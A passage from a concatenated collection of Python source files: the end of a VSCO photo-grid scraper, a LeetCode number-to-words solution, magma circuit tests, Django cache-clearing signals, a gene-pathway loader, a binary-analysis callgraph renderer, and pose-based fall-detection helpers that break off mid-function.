flattened[name] = first_level_dict[second_lvl_key]
continue
flattened[name] = None
return flattened
def _enforce_directories(self):
path = 'images/{}/'.format(self.perma_subdomain)
if not osp.isdir(path):
os.makedirs(path)
@property
def data_array_rgb(self):
if hasattr(self, '_image_data_rgb'):
return self._image_data_rgb
if not osp.isfile(self.local_filename):
self.cache_image_file()
img = io.imread(self.local_filename)
self._image_data_rgb = img
return img
@property
def data_array_lab(self):
return color.rgb2lab(self.data_array_rgb)
@property
    def primary_colors(self):
        # hasattr(self, 'primary_colors') here re-enters this property and
        # recurses forever; check the cached entry in details instead
        if 'primary_colors' in self.details:
            return self.details['primary_colors']
        primary_colors = Analyzer.find_primary_colors(self)
        self._add_param('primary_colors', primary_colors)
        return primary_colors
def cache_image_file(self):
r = self.s.get(self.link, stream=True)
if r.status_code == codes.all_good:
with open(self.local_filename, 'wb') as f:
r.raw.decode_content = True
for chunk in r.iter_content(1024):
f.write(chunk)
class Grid:
vsco_grid_url = 'http://vsco.co/grid/grid/1/'
vsco_grid_site_id = 113950
def __init__(self, subdomain='slowed', user_id=None):
self.subdomain = subdomain
self._enforce_directories()
self.session = self.s = rq.Session()
self.s.headers.update({
'User-Agent': '''Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3)
AppleWebKit/537.75.14 (KHTML, like Gecko)
Version/7.0.3 Safari/7046A194A'''
})
self.session.cookies.set('vs', self.access_token, domain='vsco.co')
if self.subdomain == 'grid':
self.user_id = self.vsco_grid_site_id
else:
self.user_id = self._grab_user_id_of_owner() \
if not user_id else user_id
self.metadata_filename = '{}.json'.format(self.subdomain)
self.metadata_filepath = ap(osp.join('meta', self.metadata_filename))
self._metadata_exists = lambda: osp.isfile(self.metadata_filepath)
def _enforce_directories(self):
path = 'images/{}/'.format(self.subdomain)
if not osp.isdir(path):
os.makedirs(path)
def _grab_session_response(self, url):
return self.session.get(url)
def _grab_html_soup(self, url):
r = self._grab_session_response(url)
return bs(r.text, 'html.parser')
def _grab_json(self, url):
r = self._grab_session_response(url)
if r.status_code == codes.all_good:
return r.json()
else:
return {}
def _grab_user_id_of_owner(self):
soup = self._grab_html_soup(self.grid_url)
soup_meta = soup.find_all('meta', property='al:ios:url')
user_app_url = soup_meta[0].get('content', None)
matcher = 'user/(?P<user_id>\d+)/grid'
match = re.search(matcher, user_app_url)
if match:
return match.group('user_id')
else:
log.debug('couldn\'t get the user_id out of: {}'
.format(user_app_url))
def _grab_token(self):
soup = self._grab_html_soup(self.vsco_grid_url)
soup_meta = soup.find_all('meta', property='og:image')
tokenized_url = soup_meta[0].get('content', None)
matcher = 'https://im.vsco.co/\d/[0-9a-fA-F]*/(?P<token>[0-9a-fA-F]*)/'
match = re.search(matcher, tokenized_url)
if match:
return match.group('token')
else:
log.debug('couldn\'t get the token out of: {}'
.format(tokenized_url))
def _fetch_media_urls(self, page_limit=None, page_size=1000):
media_url_formatter = lambda token, uid, page, size: \
'https://vsco.co/ajxp/{}/2.0/medias?site_id={}&page={}&size={}'\
.format(token, uid, page, size)
media_url_formatter__page = lambda page, size: \
media_url_formatter(
self.access_token,
self.user_id,
page,
size
)
media_meta_url = media_url_formatter__page(1, 1)
log.debug('Grabbing json response from: {}'.format(media_meta_url))
media_meta = self._grab_json(media_meta_url)
mm_remaining_count = media_meta['total']
page_limit_max = int(math.ceil(mm_remaining_count / float(page_size)))
n_pages = min(page_limit, page_limit_max) if page_limit else page_limit_max
urls = []
for page in range(1, n_pages + 1):
urls.append(media_url_formatter__page(page, page_size))
return urls
def _generate_images(self, cached_image_width=300):
for meta in tqdm(self.metadata.itervalues()):
yield Image(
meta,
self.s,
cached_image_width=cached_image_width
)
def _cache_image_metadata(self):
        metadata = [i.details for i in self.images]  # Image exposes 'details'; 'details_full' never existed
filename = '{}_{}.json'.format(self.subdomain, self.user_id)
with open(filename, 'w') as f:
json.dump(metadata, f, indent=4)
@property
    def metadata(self):
        if not getattr(self, '_metadata', None):
            self._metadata = self.deserialize_metadata()
        # return the cached copy instead of re-reading the file on every call
        return self._metadata
@property
def grid_url(self):
url_base = 'https://vsco.co/{}/grid/1'
return url_base.format(self.subdomain)
@property
def access_token(self):
token = self.s.cookies.get('vs', domain='vsco.co', default=None)
if not token:
token = self._grab_token()
log.debug('Access token grabbed and is: {}'.format(token))
self.s.cookies.set('vs', token, domain='vsco.co')
return token
@property
def size(self):
return len(self.images)
@property
def paginated_media_urls(self):
if not getattr(self, '_media_urls', None):
self._media_urls = self._fetch_media_urls()
log.debug('Built media urls up to page {}'
.format(len(self._media_urls)))
return self._media_urls
def grid_page_url(self, page):
return self.grid_url.replace('/1', '/{}'.format(page))
def grab_attribute_from_all_images(self, attribute):
values = {}
for image in self.images:
attribute_value = image.details.get(attribute, None)
if attribute_value is not None:
values[image._id] = attribute_value
return values
def attribute_freq(self,
attribute,
proportional_values=False,
ascending=False
):
histogram = defaultdict(int)
attributes = self.grab_attribute_from_all_images(attribute)
for v in attributes.values():
histogram[v] += 1
if proportional_values:
total = len(attributes)
prop = lambda v: (v / float(total))
histogram = {k: prop(v) for k, v in histogram.iteritems()}
items = histogram.items()
items_sorted = sorted(
items,
key=lambda t: t[1],
reverse=(not ascending)
)
ordered = OrderedDict(items_sorted)
return ordered
def download_metadata(self, n_threads=5):
web_request_queue = Queue()
json_serialization_queue = Queue()
urls = self.paginated_media_urls
if len(urls) > 1:
for url in urls:
web_request_queue.put(url)
web_thread = lambda: ThreadMetadataRequest(
web_request_queue,
json_serialization_queue,
self.session
)
pool_size = min(len(urls), n_threads)
web_pool = [web_thread() for x in range(pool_size)]
json_serializer = ThreadJSONWriter(
json_serialization_queue,
self.metadata_filepath
)
for thread in web_pool:
thread.setDaemon(True)
thread.start()
json_serializer.start()
web_request_queue.join()
json_serialization_queue.join()
else:
json_response = self._grab_json(urls[0])
media_entries = json_response['media']
media_dict = list_of_dicts_to_dict(
media_entries, promote_to_key='_id')
exists = osp.isfile(self.metadata_filepath)
filemode = 'r+w' if exists else 'w'
with open(self.metadata_filepath, filemode) as f:
try:
cached_meta = load_json(f) if exists else {}
except ValueError:
cached_meta = {}
cached_meta.update(media_dict)
dump_json(cached_meta, f)
self._metadata = cached_meta
def deserialize_metadata(self, return_iterator=False):
if self._metadata_exists():
with open(self.metadata_filepath, 'r') as f:
metadata = load_json(f)
return metadata
def cache_all_image_data(self):
image_queue = Queue()
for image in self._generate_images():
image_queue.put(image)
thread_pool = []
for i in range(8):
thread = ThreadCacheImageData(image_queue)
thread.start()
thread_pool.append(thread)
image_queue.join()
if '__main__' in __name__:
parser = argparse.ArgumentParser(prog='PROG')
parser.add_argument('--subdomain',
help='''Can be either the subdomain
or full url of anything with the subdomain in it''',
default='slowed'
)
parser.add_argument('--hist',
help='''Specify an Image Parameter to bin the
frequencies of the different values''',
default='preset'
)
parser.add_argument('--auto-cache',
help='''Automatically download and cache all images
in grid''',
type=bool,
default='False'
)
args = parser.parse_args()
grid = Grid(subdomain=args.subdomain)
grid.download_metadata()
grid.cache_all_image_data()
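
# --- Editor's usage sketch (not part of the original script) ---------------
# Shows how the Grid API above is driven from Python rather than the CLI.
# 'slowed' is the script's own default subdomain; grid.images is a property
# provided elsewhere in this module, everything else is defined above.
def _example_preset_histogram():
    grid = Grid(subdomain='slowed')
    grid.download_metadata()
    # Proportional frequency of each VSCO preset across the grid's images.
    for preset, share in grid.attribute_freq('preset',
                                             proportional_values=True).items():
        print('{}: {:.1%}'.format(preset, share))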
d14698eb579db72a4bb8620672365630c114783b | 1409 bytes | py | LeetCodeSolutions/LeetCode_0273.py | lih627/python-algorithm-templates | MIT

class Solution:
    def numberToWords(self, num: int) -> str:
        if not num:
            return 'Zero'
        to9 = ['One', 'Two', 'Three', 'Four', 'Five', 'Six', 'Seven', 'Eight', 'Nine']
        to19 = ['Ten', 'Eleven', 'Twelve', 'Thirteen', 'Fourteen', 'Fifteen', 'Sixteen', 'Seventeen', 'Eighteen',
                'Nineteen']
        to99 = ['Twenty', 'Thirty', 'Forty', 'Fifty', 'Sixty', 'Seventy', 'Eighty', 'Ninety']
        res = []

        def trans(n):
            ans = []
            if n // 100:
                ans.append(to9[n // 100 - 1])
                ans.append('Hundred')
            if 9 < n % 100 < 20:
                ans.append(to19[n % 100 - 10])
                return ans
            if n % 100 >= 20:
                ans.append(to99[n % 100 // 10 - 2])
            if n % 10:
                ans.append(to9[n % 10 - 1])
            return ans

        billion = num // 10 ** 9
        tmp = trans(billion)
        if tmp:
            res += tmp + ['Billion']
        million = num % 10 ** 9 // 10 ** 6
        tmp = trans(million)
        if tmp:
            res += tmp + ['Million']
        thousand = num % 10 ** 9 % 10 ** 6 // 10 ** 3
        tmp = trans(thousand)
        if tmp:
            res += tmp + ['Thousand']
        hundred = num % 10 ** 9 % 10 ** 6 % 10 ** 3
        tmp = trans(hundred)
        if tmp:
            res += tmp
        return ' '.join(res)
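
# Editor's spot checks (not part of the original solution); the expected
# strings follow the standard English number-name convention used by the problem.
if __name__ == '__main__':
    s = Solution()
    assert s.numberToWords(0) == 'Zero'
    assert s.numberToWords(123) == 'One Hundred Twenty Three'
    assert s.numberToWords(1234567) == ('One Million Two Hundred Thirty Four '
                                        'Thousand Five Hundred Sixty Seven')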
d146dce5cb180008a9518379b52a99316b5f1628 | 615 bytes | py | tests/test_circuit/test_declare.py | Kuree/magma | MIT
import magma as m


def test_declare_simple():
    And2 = m.DeclareCircuit("And2", "I0", m.In(m.Bit), "I1", m.In(m.Bit), "O",
                            m.Out(m.Bit))
    assert isinstance(And2.I0, m.BitType)


def test_declare_interface_polarity():
    And2Decl = m.DeclareCircuit("And2", "I0", m.In(m.Bit), "I1", m.In(m.Bit),
                                "O", m.Out(m.Bit))
    And2Defn = m.DefineCircuit("And2", "I0", m.In(m.Bit), "I1", m.In(m.Bit),
                               "O", m.Out(m.Bit))
    assert And2Decl.interface.ports["I0"].isinput() == \
        And2Defn.interface.ports["I0"].isinput()
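
def test_declare_simple_output():
    # Editor's addition mirroring test_declare_simple for the output port; it
    # assumes the declared output is materialised as a BitType just like I0.
    And2 = m.DeclareCircuit("And2", "I0", m.In(m.Bit), "I1", m.In(m.Bit), "O",
                            m.Out(m.Bit))
    assert isinstance(And2.O, m.BitType)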
d14a1f755d55d9ceb38f5e95241f78d970b5dd71 | 1289 bytes | py | termsandconditions/signals.py | ondergetekende/django-termsandconditions | BSD-3-Clause

""" Signals for Django """
# pylint: disable=C1001,E0202,W0613
import logging

from django.core.cache import cache
from django.dispatch import receiver
from .models import TermsAndConditions, UserTermsAndConditions
from django.db.models.signals import post_delete, post_save

LOGGER = logging.getLogger(name="termsandconditions")


@receiver([post_delete, post_save], sender=UserTermsAndConditions)
def user_terms_updated(sender, **kwargs):
    """Called when user terms and conditions is changed - to force cache clearing"""
    LOGGER.debug("User T&C Updated Signal Handler")
    if kwargs.get("instance").user:
        cache.delete(
            "tandc.not_agreed_terms_" + kwargs.get("instance").user.get_username()
        )


@receiver([post_delete, post_save], sender=TermsAndConditions)
def terms_updated(sender, **kwargs):
    """Called when terms and conditions is changed - to force cache clearing"""
    LOGGER.debug("T&C Updated Signal Handler")
    cache.delete("tandc.active_terms_ids")
    cache.delete("tandc.active_terms_list")
    if kwargs.get("instance").slug:
        cache.delete("tandc.active_terms_" + kwargs.get("instance").slug)
    for utandc in UserTermsAndConditions.objects.all():
        cache.delete("tandc.not_agreed_terms_" + utandc.user.get_username())
d14e0cc6fabd6fe07e41014cc1ba52fe4ee70327 | 1213 bytes | py | gene_finding/pathway_matrix.py | ddhostallero/cxplain | MIT

import pandas as pd

def get_valid_enrichr_pathways(pathway_nodemap):
    node_map = pd.read_csv(pathway_nodemap, sep='\t', header=None)
    pathways = node_map.loc[node_map[2] == 'Property']
    pathways = pathways.loc[pathways[4].str.contains('Homo sapiens')]
    pathways = list(pathways[0].unique())
    print("Number of Homo sapiens pathways: %d" % (len(pathways)))
    return pathways


def load_pathway(pathway_file, genes, list_of_pathways=None, threshold=0, sort=False):
    pathway = pd.read_csv(pathway_file, sep='\t', header=None)
    n_clusters = len(pathway[0].unique())
    df = pd.DataFrame(index=genes)
    genes = pd.Series(genes)
    size = pathway.groupby(0).size()
    pathway_names = []  # initialised here so the sort/return paths below never hit a NameError
    if list_of_pathways is not None:
        pathway = pathway.loc[pathway[0].isin(list_of_pathways)]
        for i, clust in enumerate(list_of_pathways):
            if size[clust] < threshold:
                continue
            genes_in_clust = pathway.loc[pathway[0] == clust][1]
            df[i] = list(genes.isin(genes_in_clust) * 1)
            pathway_names.append(clust)
    if sort:
        df.columns = pathway_names
        cols = df.sum(axis=0).sort_values().index
        df = df[cols]
        pathway_names = list(cols)
    print("Number of valid pathways: %d" % (len(pathway_names)))
    return df.T.values, pathway_names
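
# Illustrative driver (editor's addition). The two TSV paths and the gene list
# are placeholders, not files shipped with this module.
if __name__ == '__main__':
    genes = ['TP53', 'EGFR', 'BRCA1', 'KRAS']
    valid = get_valid_enrichr_pathways('pathway_nodemap.tsv')
    matrix, names = load_pathway('pathway_edges.tsv', genes,
                                 list_of_pathways=valid, threshold=5, sort=True)
    print(matrix.shape, len(names))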
d14ea0e1dd10902be328d136103d6211cebc24d9 | 4543 bytes | py | chb/graphics/DotCallgraph.py | psifertex/CodeHawk-Binary | MIT

# ------------------------------------------------------------------------------
# Python API to access CodeHawk Binary Analyzer analysis results
# Author: Henny Sipma
# ------------------------------------------------------------------------------
# The MIT License (MIT)
#
# Copyright (c) 2016-2020 Kestrel Technology LLC
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# ------------------------------------------------------------------------------

import chb.util.graphutil as UG

from chb.util.DotGraph import DotGraph


class DotCallgraph(object):

    def __init__(self, graphname, callgraph, sinks=[], startaddr=None, getname=lambda x: x):
        self.graphname = graphname
        self.callgraph = callgraph  # address -> address/name -> count
        self.dotgraph = DotGraph(graphname)
        self.dotgraph.rankdir = 'LR'
        self.sinks = sinks
        self.startaddr = startaddr
        self.pathnodes = set([])
        self.getname = getname
        if self.startaddr and not self.sinks:
            self.restrict_nodes_from(self.startaddr)
        else:
            self.restrict_nodes()

    def build(self, coloring=lambda n: 'purple'):  # name -> color / None
        if len(self.sinks) > 0:
            self.restrict_nodes()
        for n in self.callgraph:
            if coloring(n) is None:
                continue
            self.add_cg_node(n, coloring(n))
            for d in self.callgraph[n]:
                self.add_cg_edge(n, d, self.callgraph[n][d], coloring)
        return self.dotgraph

    def restrict_nodes(self):
        nodes = set([])
        edges = {}
        for n in self.callgraph:
            nodes.add(n)
            for d in self.callgraph[n]:
                nodes.add(d)
                edges.setdefault(n, [])
                edges[n].append(d)
        if self.startaddr is None:
            self.pathnodes = nodes
            return
        g = UG.DirectedGraph(nodes, edges)
        if len(self.sinks) > 0:
            g.find_paths(self.startaddr, self.sinks[0])
            for p in g.paths:
                print('Path: ' + str(p))
                self.pathnodes = self.pathnodes.union(p)
            if len(self.pathnodes) == 0:
                self.pathnodes = nodes
        else:
            self.pathnodes = nodes

    def restrict_nodes_from(self, startaddr):
        nodes = set([])
        edges = {}
        nodes.add(startaddr)
        for d in self.callgraph[startaddr]:
            nodes.add(d)
            edges.setdefault(startaddr, [])
            edges[startaddr].append(d)
        nodecount = len(nodes)
        while True:
            for n in self.callgraph:
                if n in nodes:
                    for d in self.callgraph[n]:
                        nodes.add(d)
                        edges.setdefault(n, [])
                        edges[n].append(d)
            if len(nodes) == nodecount:
                break
            nodecount = len(nodes)
        self.pathnodes = nodes

    def add_cg_node(self, n, color):
        blocktxt = self.getname(str(n))
        if str(n) in self.pathnodes:
            self.dotgraph.add_node(str(n), labeltxt=blocktxt, color=color)

    def add_cg_edge(self, n, d, count, coloring=lambda n: 'purple'):
        labeltxt = str(count)
        if coloring(d) is None:
            return
        if str(n) in self.pathnodes and str(d) in self.pathnodes:
            blocktxt = self.getname(str(d))
            self.dotgraph.add_node(str(d), labeltxt=blocktxt, color=coloring(d))
            self.dotgraph.add_edge(str(n), str(d))
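
# Minimal usage sketch (editor's addition): a toy call graph in the
# address -> callee -> count shape documented in __init__. build() returns the
# underlying chb.util.DotGraph, ready for whatever rendering that class offers.
def _example_callgraph():
    callgraph = {
        '0x1000': {'0x2000': 3, 'printf': 1},
        '0x2000': {'printf': 2},
    }
    dcg = DotCallgraph('cg', callgraph, startaddr='0x1000')
    return dcg.build(coloring=lambda n: 'purple')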
d14f5de29c43f3d58567f24eb469f0031c177a7d | 11644 bytes | py | vis/inv_pendulum.py | Inc0mple/smarteye_app | MIT

from .visual import CocoPart
import numpy as np
from helpers import *
from default_params import *


def match_ip(ip_set, new_ips, lstm_set, num_matched, consecutive_frames=DEFAULT_CONSEC_FRAMES):
    len_ip_set = len(ip_set)
    added = [False for _ in range(len_ip_set)]

    new_len_ip_set = len_ip_set
    for new_ip in new_ips:
        if not is_valid(new_ip):
            continue
        # assert valid_candidate_hist(new_ip)
        cmin = [MIN_THRESH, -1]
        for i in range(len_ip_set):
            if not added[i] and dist(last_ip(ip_set[i])[0], new_ip) < cmin[0]:
                # here add some condition that last_ip(ip_set[0]) > -5 or something
                cmin[0] = dist(last_ip(ip_set[i])[0], new_ip)
                cmin[1] = i

        if cmin[1] == -1:
            ip_set.append([None for _ in range(consecutive_frames - 1)] + [new_ip])
            lstm_set.append([None, 0, 0, 0])  # Initial hidden state of lstm is None
            new_len_ip_set += 1
        else:
            added[cmin[1]] = True
            pop_and_add(ip_set[cmin[1]], new_ip, consecutive_frames)

    new_matched = num_matched
    removed_indx = []
    removed_match = []
    for i in range(len(added)):
        if not added[i]:
            pop_and_add(ip_set[i], None, consecutive_frames)
            if ip_set[i] == [None for _ in range(consecutive_frames)]:
                if i < num_matched:
                    new_matched -= 1
                    removed_match.append(i)
                new_len_ip_set -= 1
                removed_indx.append(i)

    for i in sorted(removed_indx, reverse=True):
        ip_set.pop(i)
        lstm_set.pop(i)  # pop the matching entry (not the last one) so the two lists stay aligned

    return new_matched, new_len_ip_set, removed_match


def extend_vector(p1, p2, l):
    # Compute the offset once: the original updated p1 first and then reused
    # the already-moved p1 when shifting p2, stretching the segment unevenly.
    offset = (p1 - p2) * l / (2 * np.linalg.norm((p1 - p2), 2))
    p1 = p1 + offset
    p2 = p2 - offset
    return p1, p2


def perp(a):
    b = np.empty_like(a)
    b[0] = -a[1]
    b[1] = a[0]
    return b


# line segment a given by endpoints a1, a2
# line segment b given by endpoints b1, b2
# returns the intersection point of the two supporting lines
def seg_intersect(a1, a2, b1, b2):
    da = a2 - a1
    db = b2 - b1
    dp = a1 - b1
    dap = perp(da)
    denom = np.dot(dap, db)
    num = np.dot(dap, dp)
    return (num / denom.astype(float)) * db + b1
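
# Quick numeric check of seg_intersect (editor's addition): the diagonals
# (0,0)-(2,2) and (0,2)-(2,0) cross at (1,1), which the perp-dot construction
# above recovers (denom = -8, num = -4, so b1 + 0.5*db = (1, 1)).
def _check_seg_intersect():
    p = seg_intersect(np.array([0., 0.]), np.array([2., 2.]),
                      np.array([0., 2.]), np.array([2., 0.]))
    assert np.allclose(p, [1., 1.])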

def get_kp(kp):
    threshold1 = 5e-3
    # dict of np arrays of coordinates
    inv_pend = {}
    # print(type(kp[CocoPart.LEar]))
    numx = (kp[CocoPart.LEar][2]*kp[CocoPart.LEar][0] + kp[CocoPart.LEye][2]*kp[CocoPart.LEye][0] +
            kp[CocoPart.REye][2]*kp[CocoPart.REye][0] + kp[CocoPart.REar][2]*kp[CocoPart.REar][0])
    numy = (kp[CocoPart.LEar][2]*kp[CocoPart.LEar][1] + kp[CocoPart.LEye][2]*kp[CocoPart.LEye][1] +
            kp[CocoPart.REye][2]*kp[CocoPart.REye][1] + kp[CocoPart.REar][2]*kp[CocoPart.REar][1])
    den = kp[CocoPart.LEar][2] + kp[CocoPart.LEye][2] + kp[CocoPart.REye][2] + kp[CocoPart.REar][2]

    if den < HEAD_THRESHOLD:
        inv_pend['H'] = None
    else:
        inv_pend['H'] = np.array([numx/den, numy/den])

    if all([kp[CocoPart.LShoulder], kp[CocoPart.RShoulder],
            kp[CocoPart.LShoulder][2] > threshold1, kp[CocoPart.RShoulder][2] > threshold1]):
        inv_pend['N'] = np.array([(kp[CocoPart.LShoulder][0]+kp[CocoPart.RShoulder][0])/2,
                                  (kp[CocoPart.LShoulder][1]+kp[CocoPart.RShoulder][1])/2])
    else:
        inv_pend['N'] = None

    if all([kp[CocoPart.LHip], kp[CocoPart.RHip],
            kp[CocoPart.LHip][2] > threshold1, kp[CocoPart.RHip][2] > threshold1]):
        inv_pend['B'] = np.array([(kp[CocoPart.LHip][0]+kp[CocoPart.RHip][0])/2,
                                  (kp[CocoPart.LHip][1]+kp[CocoPart.RHip][1])/2])
    else:
        inv_pend['B'] = None

    if kp[CocoPart.LKnee] is not None and kp[CocoPart.LKnee][2] > threshold1:
        inv_pend['KL'] = np.array([kp[CocoPart.LKnee][0], kp[CocoPart.LKnee][1]])
    else:
        inv_pend['KL'] = None

    if kp[CocoPart.RKnee] is not None and kp[CocoPart.RKnee][2] > threshold1:
        inv_pend['KR'] = np.array([kp[CocoPart.RKnee][0], kp[CocoPart.RKnee][1]])
    else:
        inv_pend['KR'] = None

    if inv_pend['B'] is not None:
        if inv_pend['N'] is not None:
            height = np.linalg.norm(inv_pend['N'] - inv_pend['B'], 2)
            LS, RS = extend_vector(np.asarray(kp[CocoPart.LShoulder][:2]),
                                   np.asarray(kp[CocoPart.RShoulder][:2]), height/4)
            LB, RB = extend_vector(np.asarray(kp[CocoPart.LHip][:2]),
                                   np.asarray(kp[CocoPart.RHip][:2]), height/3)
            ubbox = (LS, RS, RB, LB)
            if inv_pend['KL'] is not None and inv_pend['KR'] is not None:
                lbbox = (LB, RB, inv_pend['KR'], inv_pend['KL'])
            else:
                lbbox = ([0, 0], [0, 0])
                # lbbox = None
        else:
            ubbox = ([0, 0], [0, 0])
            # ubbox = None
            if inv_pend['KL'] is not None and inv_pend['KR'] is not None:
                lbbox = (np.array(kp[CocoPart.LHip][:2]), np.array(kp[CocoPart.RHip][:2]),
                         inv_pend['KR'], inv_pend['KL'])
            else:
                lbbox = ([0, 0], [0, 0])
                # lbbox = None
    else:
        ubbox = ([0, 0], [0, 0])
        lbbox = ([0, 0], [0, 0])
        # ubbox = None
        # lbbox = None

    # condition = (inv_pend["H"] is None) and (inv_pend['N'] is not None and inv_pend['B'] is not None)
    # if condition:
    #     print("half disp")

    return inv_pend, ubbox, lbbox


def get_angle(v0, v1):
    return np.math.atan2(np.linalg.det([v0, v1]), np.dot(v0, v1))


def is_valid(ip):
    assert ip is not None
    ip = ip["keypoints"]
    return (ip['B'] is not None and ip['N'] is not None and ip['H'] is not None)


def get_rot_energy(ip0, ip1):
    t = ip1["time"] - ip0["time"]
    ip0 = ip0["keypoints"]
    ip1 = ip1["keypoints"]
    m1 = 1
    m2 = 5
    m3 = 5
    energy = 0
    den = 0

    N1 = ip1['N'] - ip1['B']
    N0 = ip0['N'] - ip0['B']
    d2sq = N1.dot(N1)
    w2sq = (get_angle(N0, N1)/t)**2
    energy += m2*d2sq*w2sq
    den += m2*d2sq

    H1 = ip1['H'] - ip1['B']
    H0 = ip0['H'] - ip0['B']
    d1sq = H1.dot(H1)
    w1sq = (get_angle(H0, H1)/t)**2
    energy += m1*d1sq*w1sq
    den += m1*d1sq

    energy = energy/(2*den)
    # energy = energy/2
    return energy

def get_angle_vertical(v):
    return np.math.atan2(-v[0], -v[1])


def get_gf(ip0, ip1, ip2):
    t1 = ip1["time"] - ip0["time"]
    t2 = ip2["time"] - ip1["time"]
    ip0 = ip0["keypoints"]
    ip1 = ip1["keypoints"]
    ip2 = ip2["keypoints"]
    m1 = 1
    m2 = 15
    g = 10

    H2 = ip2['H'] - ip2['N']
    H1 = ip1['H'] - ip1['N']
    H0 = ip0['H'] - ip0['N']
    d1 = np.sqrt(H1.dot(H1))
    theta_1_plus_2_2 = get_angle_vertical(H2)
    theta_1_plus_2_1 = get_angle_vertical(H1)
    theta_1_plus_2_0 = get_angle_vertical(H0)
    # print("H: ", H0, H1, H2)

    N2 = ip2['N'] - ip2['B']
    N1 = ip1['N'] - ip1['B']
    N0 = ip0['N'] - ip0['B']
    d2 = np.sqrt(N1.dot(N1))
    # print("N: ", N0, N1, N2)

    theta_2_2 = get_angle_vertical(N2)
    theta_2_1 = get_angle_vertical(N1)
    theta_2_0 = get_angle_vertical(N0)
    # print("theta_2_2:", theta_2_2, "theta_2_1:", theta_2_1, "theta_2_0:", theta_2_0, sep=", ")

    theta_1_0 = theta_1_plus_2_0 - theta_2_0
    theta_1_1 = theta_1_plus_2_1 - theta_2_1
    theta_1_2 = theta_1_plus_2_2 - theta_2_2
    # print("theta1: ", theta_1_0, theta_1_1, theta_1_2)
    # print("theta2: ", theta_2_0, theta_2_1, theta_2_2)

    theta2 = theta_2_1
    theta1 = theta_1_1

    del_theta1_0 = (get_angle(H0, H1))/t1
    del_theta1_1 = (get_angle(H1, H2))/t2
    del_theta2_0 = (get_angle(N0, N1))/t1
    del_theta2_1 = (get_angle(N1, N2))/t2
    # print("del_theta2_1:", del_theta2_1, "del_theta2_0:", del_theta2_0, sep=",")

    del_theta1 = 0.5 * (del_theta1_1 + del_theta1_0)
    del_theta2 = 0.5 * (del_theta2_1 + del_theta2_0)
    # parenthesised: the original divided by 0.5 and then *multiplied* by
    # (t1 + t2), which is not an angular acceleration
    doubledel_theta1 = (del_theta1_1 - del_theta1_0) / (0.5 * (t1 + t2))
    doubledel_theta2 = (del_theta2_1 - del_theta2_0) / (0.5 * (t1 + t2))
    # print("doubledel_theta2:", doubledel_theta2)

    d1 = d1/d2
    d2 = 1
    # print("del_theta", del_theta1, del_theta2)
    # print("doubledel_theta", doubledel_theta1, doubledel_theta2)

    Q_RD1 = 0
    Q_RD1 += m1 * d1 * doubledel_theta1 * doubledel_theta1
    Q_RD1 += (m1*d1*d1 + m1*d1*d2*np.cos(theta1))*doubledel_theta2
    Q_RD1 += m1*d1*d2*np.sin(theta1)*del_theta2*del_theta2
    Q_RD1 -= m1*g*d2*np.sin(theta1+theta2)

    Q_RD2 = 0
    Q_RD2 += (m1*d1*d1 + m1*d1*d2*np.cos(theta1))*doubledel_theta1
    Q_RD2 += ((m1+m2)*d2*d2 + m1*d1*d1 + 2*m1*d1*d2*np.cos(theta1))*doubledel_theta2
    Q_RD2 -= 2*m1*d1*d2*np.sin(theta1)*del_theta2*del_theta1 + m1*d1 * \
        d2*np.sin(theta1)*del_theta1*del_theta1
    Q_RD2 -= (m1 + m2)*g*d2*np.sin(theta2) + m1*g*d1*np.sin(theta1 + theta2)
    # print("Energy: ", Q_RD1 + Q_RD2)
    return Q_RD1 + Q_RD2


def get_height_bbox(ip):
    bbox = ip["box"]
    # the original asserted type(bbox == np.ndarray), which is always truthy
    assert isinstance(bbox, np.ndarray)
    diff_box = bbox[1] - bbox[0]
    return diff_box[1]


def get_ratio_bbox(ip):
    bbox = ip["box"]
    assert isinstance(bbox, np.ndarray)  # see get_height_bbox: the original check was vacuous
    diff_box = bbox[1] - bbox[0]
    if diff_box[1] == 0:
        diff_box[1] += 1e5*diff_box[0]
    assert np.any(diff_box > 0)
    ratio = diff_box[0]/diff_box[1]
    return ratio


def get_ratio_derivative(ip0, ip1):
    ratio_der = None
    time = ip1["time"] - ip0["time"]
    diff_box = ip1["features"]["ratio_bbox"] - ip0["features"]["ratio_bbox"]
    assert time != 0
    ratio_der = diff_box/time

    return ratio_der


def match_ip2(matched_ip_set, unmatched_ip_set, new_ips, re_matrix, gf_matrix, consecutive_frames=DEFAULT_CONSEC_FRAMES):
    len_matched_ip_set = len(matched_ip_set)
    added_matched = [False for _ in range(len_matched_ip_set)]
    len_unmatched_ip_set = len(unmatched_ip_set)
    added_unmatched = [False for _ in range(len_unmatched_ip_set)]
    for new_ip in new_ips:
        if not is_valid(new_ip):
            continue
        cmin = [MIN_THRESH, -1]
        connected_set = None
        connected_added = None
        for i in range(len_matched_ip_set):
            if not added_matched[i] and dist(last_ip(matched_ip_set[i])[0], new_ip) < cmin[0]:
                # here add some condition that last_ip(ip_set[0]) > -5 or something
                cmin[0] = dist(last_ip(matched_ip_set[i])[0], new_ip)
                cmin[1] = i
                connected_set = matched_ip_set
                connected_added = added_matched
        for i in range(len_unmatched_ip_set):
            if not added_unmatched[i] and dist(last_ip(unmatched_ip_set[i])[0], new_ip) < cmin[0]:
                # here add some condition that last_ip(ip_set[0]) > -5 or something
                cmin[0] = dist(last_ip(unmatched_ip_set[i])[0], new_ip)
                cmin[1] = i
                connected_set = unmatched_ip_set
                connected_added = added_unmatched

        if cmin[1] == -1:
            unmatched_ip_set.append([None for _ in range(consecutive_frames - 1)] + [new_ip])
            # re_matrix.append([])
            # gf_matrix.append([])
        else:
            connected_added[cmin[1]] = True
